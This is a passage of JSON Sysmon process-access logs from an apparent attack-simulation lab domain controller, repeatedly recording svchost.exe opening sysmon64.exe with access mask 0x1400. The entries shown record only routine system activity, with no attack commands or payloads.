06:55:15.306","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5387,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5388,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5389,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5390,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5391,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5392,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5393,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5394,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 